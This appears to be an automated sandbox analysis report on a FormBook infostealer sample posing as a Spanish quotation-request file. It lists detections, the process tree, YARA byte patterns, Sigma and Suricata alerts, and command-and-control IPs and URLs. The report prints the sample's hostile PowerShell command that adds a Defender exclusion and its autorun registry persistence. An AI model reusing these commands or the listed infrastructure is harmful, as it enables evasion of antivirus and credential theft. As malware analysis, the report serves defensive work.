Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe

Overview

General Information

Sample name:z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe
Analysis ID:1509644
MD5:ee557be5d5e16d9ea01241f09a19a87b
SHA1:e83e01dca3b3684e4f417b85bb4172dc635377e8
SHA256:e42b2065cd7683b0be8702853b309e09474f23ff67851cb8295686194006622a
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
Yara detected UAC Bypass using CMSTP
.NET source code references suspicious native API functions
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates autostart registry keys with suspicious names
Disables UAC (registry)
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe (PID: 7448 cmdline: "C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe" MD5: EE557BE5D5E16D9EA01241F09A19A87B)
    • powershell.exe (PID: 7564 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe" -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7896 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • wab.exe (PID: 7608 cmdline: "C:\Program Files (x86)\Windows Mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
      • sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe (PID: 6936 cmdline: "C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • SecEdit.exe (PID: 8036 cmdline: "C:\Windows\SysWOW64\SecEdit.exe" MD5: BFC13856291E4B804D33BBAEFC8CB3B5)
          • sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe (PID: 4832 cmdline: "C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7240 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
    • wab.exe (PID: 7624 cmdline: "C:\Program Files (x86)\Windows Mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
    • WerFault.exe (PID: 7728 cmdline: C:\Windows\system32\WerFault.exe -u -p 7448 -s 1404 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • wab.exe (PID: 7248 cmdline: "C:\Program Files (x86)\Windows Mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • rundll32.exe (PID: 6692 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • wab.exe (PID: 2504 cmdline: "C:\Program Files (x86)\Windows Mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.1543223916.0000000002D80000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000004.00000002.1543223916.0000000002D80000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2a9a0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13f4f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    0000000C.00000002.3791309968.0000000002A30000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000C.00000002.3791309968.0000000002A30000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2a9a0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13f4f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      0000000E.00000002.3795206841.00000000053A0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 14 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        4.2.wab.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          4.2.wab.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2dc83:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x17232:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          4.2.wab.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            4.2.wab.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2ce83:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x16432:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe", ParentImage: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe, ParentProcessId: 7448, ParentProcessName: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe" -Force, ProcessId: 7564, ProcessName: powershell.exe
            Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
            Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe" , CommandLine: "C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe" , CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, NewProcessName: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, OriginalFileName: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, ParentCommandLine: "C:\Program Files (x86)\Windows Mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 7608, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe" , ProcessId: 6936, ProcessName: sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
            Sigma detected: CurrentVersion Autorun Keys Modification
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Program Files (x86)\Windows Mail\wab.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\SecEdit.exe, ProcessId: 8036, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\26RXLR-
            Sigma detected: Powershell Defender Exclusion
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe", ParentImage: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe, ParentProcessId: 7448, ParentProcessName: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe" -Force, ProcessId: 7564, ProcessName: powershell.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe", ParentImage: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe, ParentProcessId: 7448, ParentProcessName: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe" -Force, ProcessId: 7564, ProcessName: powershell.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-11T22:02:49.640040+020020507451Malware Command and Control Activity Detected192.168.2.1049707217.70.184.5080TCP
            2024-09-11T22:03:13.538921+020020507451Malware Command and Control Activity Detected192.168.2.1049712199.192.19.1980TCP
            2024-09-11T22:03:27.843432+020020507451Malware Command and Control Activity Detected192.168.2.104971691.184.0.11180TCP
            2024-09-11T22:03:42.170263+020020507451Malware Command and Control Activity Detected192.168.2.1049720193.108.130.2380TCP
            2024-09-11T22:03:56.395789+020020507451Malware Command and Control Activity Detected192.168.2.104972447.239.13.17280TCP
            2024-09-11T22:04:31.770471+020020507451Malware Command and Control Activity Detected192.168.2.1049728154.213.157.3280TCP
            2024-09-11T22:04:45.907910+020020507451Malware Command and Control Activity Detected192.168.2.104973247.239.13.17280TCP
            2024-09-11T22:04:59.223467+020020507451Malware Command and Control Activity Detected192.168.2.104973691.195.240.1980TCP
            2024-09-11T22:05:13.260346+020020507451Malware Command and Control Activity Detected192.168.2.1049740198.12.241.3580TCP
            2024-09-11T22:05:26.773021+020020507451Malware Command and Control Activity Detected192.168.2.104974491.195.240.1980TCP
            2024-09-11T22:06:09.903190+020020507451Malware Command and Control Activity Detected192.168.2.104974831.186.11.25480TCP
            2024-09-11T22:06:23.712219+020020507451Malware Command and Control Activity Detected192.168.2.1049752192.250.231.2880TCP
            2024-09-11T22:06:37.962678+020020507451Malware Command and Control Activity Detected192.168.2.104975647.239.13.17280TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-11T22:03:05.636449+020028554641A Network Trojan was detected192.168.2.1049709199.192.19.1980TCP
            2024-09-11T22:03:08.481012+020028554641A Network Trojan was detected192.168.2.1049710199.192.19.1980TCP
            2024-09-11T22:03:10.994616+020028554641A Network Trojan was detected192.168.2.1049711199.192.19.1980TCP
            2024-09-11T22:03:19.922113+020028554641A Network Trojan was detected192.168.2.104971391.184.0.11180TCP
            2024-09-11T22:03:22.474600+020028554641A Network Trojan was detected192.168.2.104971491.184.0.11180TCP
            2024-09-11T22:03:25.415863+020028554641A Network Trojan was detected192.168.2.104971591.184.0.11180TCP
            2024-09-11T22:03:34.587409+020028554641A Network Trojan was detected192.168.2.1049717193.108.130.2380TCP
            2024-09-11T22:03:37.144072+020028554641A Network Trojan was detected192.168.2.1049718193.108.130.2380TCP
            2024-09-11T22:03:39.725437+020028554641A Network Trojan was detected192.168.2.1049719193.108.130.2380TCP
            2024-09-11T22:03:48.831925+020028554641A Network Trojan was detected192.168.2.104972147.239.13.17280TCP
            2024-09-11T22:03:51.334838+020028554641A Network Trojan was detected192.168.2.104972247.239.13.17280TCP
            2024-09-11T22:03:53.999481+020028554641A Network Trojan was detected192.168.2.104972347.239.13.17280TCP
            2024-09-11T22:04:04.315698+020028554641A Network Trojan was detected192.168.2.1049725154.213.157.3280TCP
            2024-09-11T22:04:06.849751+020028554641A Network Trojan was detected192.168.2.1049726154.213.157.3280TCP
            2024-09-11T22:04:09.377961+020028554641A Network Trojan was detected192.168.2.1049727154.213.157.3280TCP
            2024-09-11T22:04:38.312957+020028554641A Network Trojan was detected192.168.2.104972947.239.13.17280TCP
            2024-09-11T22:04:40.850212+020028554641A Network Trojan was detected192.168.2.104973047.239.13.17280TCP
            2024-09-11T22:04:43.622662+020028554641A Network Trojan was detected192.168.2.104973147.239.13.17280TCP
            2024-09-11T22:04:51.625711+020028554641A Network Trojan was detected192.168.2.104973391.195.240.1980TCP
            2024-09-11T22:04:54.155382+020028554641A Network Trojan was detected192.168.2.104973491.195.240.1980TCP
            2024-09-11T22:04:56.682829+020028554641A Network Trojan was detected192.168.2.104973591.195.240.1980TCP
            2024-09-11T22:05:05.474119+020028554641A Network Trojan was detected192.168.2.1049737198.12.241.3580TCP
            2024-09-11T22:05:08.549097+020028554641A Network Trojan was detected192.168.2.1049738198.12.241.3580TCP
            2024-09-11T22:05:10.877753+020028554641A Network Trojan was detected192.168.2.1049739198.12.241.3580TCP
            2024-09-11T22:05:18.997419+020028554641A Network Trojan was detected192.168.2.104974191.195.240.1980TCP
            2024-09-11T22:05:21.677864+020028554641A Network Trojan was detected192.168.2.104974291.195.240.1980TCP
            2024-09-11T22:05:24.030304+020028554641A Network Trojan was detected192.168.2.104974391.195.240.1980TCP
            2024-09-11T22:05:41.799821+020028554641A Network Trojan was detected192.168.2.104974531.186.11.25480TCP
            2024-09-11T22:05:44.974968+020028554641A Network Trojan was detected192.168.2.104974631.186.11.25480TCP
            2024-09-11T22:05:47.502944+020028554641A Network Trojan was detected192.168.2.104974731.186.11.25480TCP
            2024-09-11T22:06:15.495299+020028554641A Network Trojan was detected192.168.2.1049749192.250.231.2880TCP
            2024-09-11T22:06:18.793022+020028554641A Network Trojan was detected192.168.2.1049750192.250.231.2880TCP
            2024-09-11T22:06:21.178494+020028554641A Network Trojan was detected192.168.2.1049751192.250.231.2880TCP
            2024-09-11T22:06:30.426319+020028554641A Network Trojan was detected192.168.2.104975347.239.13.17280TCP
            2024-09-11T22:06:32.914154+020028554641A Network Trojan was detected192.168.2.104975447.239.13.17280TCP
            2024-09-11T22:06:35.474379+020028554641A Network Trojan was detected192.168.2.104975547.239.13.17280TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeAvira: detected
            Antivirus detection for URL or domain
            Source: http://www.aceautocorp.com/9og3/Avira URL Cloud: Label: malware
            Source: http://www.purpleheartlacey.com/rlev/Avira URL Cloud: Label: malware
            Source: http://www.purpleheartlacey.com/rlev/?bFGXGTdX=Wo1R3wm8Ej8entDC+cV4KaEDP0IDvxtNKgFdfJiYIIGalaQSkKKZ1Xkt0Su2x108KR/fnP4QiNVkos1WTd/84fgdAaOORrOEsxtw8yTuzQl5BJwg/A==&M87d=RDddFbF8Avira URL Cloud: Label: malware
            Source: http://aceautocorp.com/9og3/?bFGXGTdX=ZBkskPBELyIjvtDi08MWm9rbu3iLorcPFzn2FRxS1jOC36b61Sx96mOKAvira URL Cloud: Label: malware
            Source: http://www.goodgiftguru.com/p2ly/?bFGXGTdX=854srIWxIbaR7EG2BVBjn1PfwNbGMwTqcAT48G/3DKSB08gEc85mKKLIvkpoComultp7rI80f5482EKJDc++UJ/X9hbLrPJpiCWZeROTRI35j/SOzA==&M87d=RDddFbF8Avira URL Cloud: Label: malware
            Multi AV Scanner detection for submitted file
            Source: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeReversingLabs: Detection: 36%
            Yara detected FormBook
            Source: Yara matchFile source: 4.2.wab.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.wab.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.1543223916.0000000002D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3791309968.0000000002A30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.3795206841.00000000053A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1542801016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3791449632.0000000002A70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3790655186.0000000000570000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3792934989.0000000004160000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1543864387.0000000004D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeJoe Sandbox ML: detected

            Exploits

            barindex
            Yara detected UAC Bypass using CMSTP
            Source: Yara matchFile source: 00000000.00000002.1462696437.0000023E0853C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe PID: 7448, type: MEMORYSTR
            Source: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER6339.tmp.dmp.8.dr
            Source: Binary string: System.Xml.ni.pdb source: WER6339.tmp.dmp.8.dr
            Source: Binary string: System.pdb` source: WER6339.tmp.dmp.8.dr
            Source: Binary string: SecEdit.pdb source: wab.exe, 00000004.00000002.1543304838.0000000003197000.00000004.00000020.00020000.00000000.sdmp, sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000B.00000002.3791818331.000000000102E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.ni.pdbRSDS source: WER6339.tmp.dmp.8.dr
            Source: Binary string: System.Windows.Forms.ni.pdb source: WER6339.tmp.dmp.8.dr
            Source: Binary string: wntdll.pdbUGP source: wab.exe, 00000004.00000003.1452243090.0000000003449000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1450246233.0000000003290000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 00000004.00000002.1543418922.000000000378E000.00000040.00001000.00020000.00000000.sdmp, SecEdit.exe, 0000000C.00000002.3792654545.000000000313E000.00000040.00001000.00020000.00000000.sdmp, SecEdit.exe, 0000000C.00000003.1545415018.0000000002DF6000.00000004.00000020.00020000.00000000.sdmp, SecEdit.exe, 0000000C.00000003.1543063354.0000000002C09000.00000004.00000020.00020000.00000000.sdmp, SecEdit.exe, 0000000C.00000002.3792654545.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: System.Drawing.ni.pdb source: WER6339.tmp.dmp.8.dr
            Source: Binary string: wntdll.pdb source: wab.exe, wab.exe, 00000004.00000003.1452243090.0000000003449000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1450246233.0000000003290000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 00000004.00000002.1543418922.000000000378E000.00000040.00001000.00020000.00000000.sdmp, SecEdit.exe, SecEdit.exe, 0000000C.00000002.3792654545.000000000313E000.00000040.00001000.00020000.00000000.sdmp, SecEdit.exe, 0000000C.00000003.1545415018.0000000002DF6000.00000004.00000020.00020000.00000000.sdmp, SecEdit.exe, 0000000C.00000003.1543063354.0000000002C09000.00000004.00000020.00020000.00000000.sdmp, SecEdit.exe, 0000000C.00000002.3792654545.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.ni.pdb source: WER6339.tmp.dmp.8.dr
            Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER6339.tmp.dmp.8.dr
            Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER6339.tmp.dmp.8.dr
            Source: Binary string: System.Configuration.pdb source: WER6339.tmp.dmp.8.dr
            Source: Binary string: System.Drawing.ni.pdbRSDS source: WER6339.tmp.dmp.8.dr
            Source: Binary string: System.Core.pdbH source: WER6339.tmp.dmp.8.dr
            Source: Binary string: wab.pdbGCTL source: SecEdit.exe, 0000000C.00000002.3791538876.0000000002B0D000.00000004.00000020.00020000.00000000.sdmp, SecEdit.exe, 0000000C.00000002.3793502568.00000000035CC000.00000004.10000000.00040000.00000000.sdmp, sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000E.00000002.3792978894.0000000002F6C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000013.00000002.1886634795.000000001F9DC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: System.Xml.pdb source: WER6339.tmp.dmp.8.dr
            Source: Binary string: System.pdb source: WER6339.tmp.dmp.8.dr
            Source: Binary string: System.Xml.ni.pdbRSDS# source: WER6339.tmp.dmp.8.dr
            Source: Binary string: wab.pdb source: SecEdit.exe, 0000000C.00000002.3791538876.0000000002B0D000.00000004.00000020.00020000.00000000.sdmp, SecEdit.exe, 0000000C.00000002.3793502568.00000000035CC000.00000004.10000000.00040000.00000000.sdmp, sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000E.00000002.3792978894.0000000002F6C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000013.00000002.1886634795.000000001F9DC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: System.Core.ni.pdb source: WER6339.tmp.dmp.8.dr
            Source: Binary string: Microsoft.VisualBasic.pdb source: WER6339.tmp.dmp.8.dr
            Source: Binary string: System.Windows.Forms.pdb source: WER6339.tmp.dmp.8.dr
            Source: Binary string: mscorlib.pdb source: WER6339.tmp.dmp.8.dr
            Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER6339.tmp.dmp.8.dr
            Source: Binary string: SecEdit.pdbGCTL source: wab.exe, 00000004.00000002.1543304838.0000000003197000.00000004.00000020.00020000.00000000.sdmp, sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000B.00000002.3791818331.000000000102E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000B.00000000.1467468971.00000000006CE000.00000002.00000001.01000000.00000008.sdmp, sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000E.00000002.3790653322.00000000006CE000.00000002.00000001.01000000.00000008.sdmp
            Source: Binary string: System.Drawing.pdb source: WER6339.tmp.dmp.8.dr
            Source: Binary string: mscorlib.ni.pdb source: WER6339.tmp.dmp.8.dr
            Source: Binary string: System.Core.pdb source: WER6339.tmp.dmp.8.dr
            Source: Binary string: System.Windows.Forms.pdb8 source: WER6339.tmp.dmp.8.dr
            Source: Binary string: System.Drawing.pdb source: WER6339.tmp.dmp.8.dr
            Source: Binary string: System.Xml.pdbpH source: WER6339.tmp.dmp.8.dr
            Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER6339.tmp.dmp.8.dr
            Source: Binary string: System.ni.pdb source: WER6339.tmp.dmp.8.dr
            Source: Binary string: System.Core.ni.pdbRSDS source: WER6339.tmp.dmp.8.dr
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_0058BC80 FindFirstFileW,FindNextFileW,FindClose,12_2_0058BC80
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then pop edi4_2_00418543
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4x nop then xor eax, eax12_2_00579870
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4x nop then pop edi12_2_00585260
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4x nop then mov ebx, 00000004h12_2_02DF053F

            Networking

            barindex
            Suricata IDS alerts for network traffic
